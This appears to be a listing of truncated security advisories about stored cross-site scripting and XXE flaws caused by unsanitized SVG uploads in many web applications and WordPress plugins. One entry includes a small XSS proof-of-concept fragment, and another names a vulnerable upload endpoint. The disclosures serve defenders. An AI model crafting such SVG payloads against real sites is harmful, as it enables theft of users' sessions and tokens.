PT-2026-46891

SVG files are in the allowed extensions whitelist and can be uploaded by any admin user via the media manager. There is zero SVG content sanitization anywhere in the upload pipeline. A malicious SVG with JavaScript onload, , executes in the context of the Shopware domain when accessed. The Proble...

phpMyFAQ 跨站脚本漏洞

phpMyFAQ is a multilingual, database-driven FAQ system developed by Thorsten Rinne. Versions of phpMyFAQ prior to 4.1.2 had a cross-site scripting vulnerability. This vulnerability stemmed from a recursive entity decoding limit of 5 times in SvgSanitizer::decodeAllEntities, allowing users with...

Arbitrary File Upload

Overview Affected versions of this package are vulnerable to Arbitrary File Upload via the file upload. An administrator can execute arbitrary JavaScript in the context of the application by uploading a crafted SVG or HTML file containing malicious scripts, which are then served to users without...

EUVD-2026-9022

PluXml CMS is vulnerable to Stored XSS in file uploading functionality. An authenticated attacker can upload an SVG file containing a malicious payload, which will be executed when a victim clicks the link associated with the uploaded image. In version 5.9.0-rc7 clicking the link associated with...

CVE-2026-27616

Vikunja prior to version 2.0.0 permitted uploading SVG attachments without sanitization. Uploaded SVGs rendered inline under the app’s origin, allowing embedded JavaScript to run in the context of the authenticated user, exposing the token stored in localStorage. This CVE describes a stored XSS r...

CVE-2026-24743 InvoicePlane has a Stored Cross-Site Scripting (XSS) issue

InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A Stored Cross-Site Scripting XSS vulnerability occurs in the upload Invoice Logo functions of InvoicePlane version 1.7.0. The Upload Invoice Logo function allows the application to upload svg file...

CVE-2025-41085

Stored Cross-Site Scripting XSS vulnerability type in Apidog in the version 2.7.15, where SVG image uploads are not properly sanitized. This allows attackers to embed malicious scripts in SVG files by sending a POST request to '/api/v1/user-avatar', which are then stored on the server and execute...

CVE-2025-14478

CVE-2025-14478 (Demo Importer Plus, WordPress) : The Demo Importer Plus plugin is vulnerable to XML External Entity (XXE) injection via SVG file uploads in all versions up to 2.0.9. Exploitation requires authentication at Author level or higher, and, in affected PHP configurations (older than 8.0...

CVE-2025-64759

Homarr is an open-source dashboard. Prior to version 1.43.3, stored XSS vulnerability exists, allowing the execution of arbitrary JavaScript in a user's browser, with minimal or no user interaction required, due to the rendering of a malicious uploaded SVG file. This could be abused to add an...

homarr 代码问题漏洞

homarr is a customizable browser homepage by Thomas Camlong, an individual developer, that is used to interact with Docker containers on the main server. A code issue vulnerability exists in homarr versions prior to 1.43.3, which stems from a maliciously uploaded SVG file that could lead to a...

CVE-2025-35060

Newforma Info Exchange NIX provides a 'Send a File Transfer' feature that allows a remote, authenticated attacker to upload SVG files that contain JavaScript or other content that may be executed or rendered by a web browser using a mobile user agent...

CVE-2025-59525

Horilla HRMS prior to 1.4.0 is vulnerable to Cross-Site Scripting (XSS) via uploaded SVG files (and via allowed embed/ tags), enabling script execution when affected content (e.g., announcements) is viewed and potentially leading to an admin account takeover. The issue stems from improper sanitiz...

Cross-site Scripting (XSS)

Overview digimix/wp-svg-upload is a plugin that adds full SVG media support to WordPress. Affected versions of this package are vulnerable to Cross-site Scripting XSS through the upload process. An attacker can inject malicious scripts by uploading specially crafted SVG files. PoC alert'xss';...

WordPress WP SVG Upload plugin <= 1.0.0 - Author+ Stored XSS via SVG vulnerability

Author+ Stored XSS via SVG vulnerability discovered by Pierre Rudloff in WordPress Plugin WP SVG Upload versions = 1.0.0...

CVE-2024-7778

The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.10.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access...

PT-2024-22858 · Unknown · Volmarg Personal Management System

Name of the Vulnerable Software and Affected Versions: Volmarg Personal Management System version 1.4.64 Description: The issue concerns stored cross site scripting XSS via the upload of an SVG file that contains embedded JavaScript code. This allows for the potential execution of malicious scrip...

PT-2024-29185 · WordPress · Cost Calculator Builder

Name of the Vulnerable Software and Affected Versions: Cost Calculator Builder plugin for WordPress versions up to, and including, 3.1.67 Description: The issue is related to Stored Cross-Site Scripting via the SVG upload feature due to insufficient input sanitization and output escaping. This...

CVE-2022-40358

An issue was discovered in AjaXplorer 4.2.3, allows attackers to cause cross site scripting vulnerabilities via a crafted svg file upload...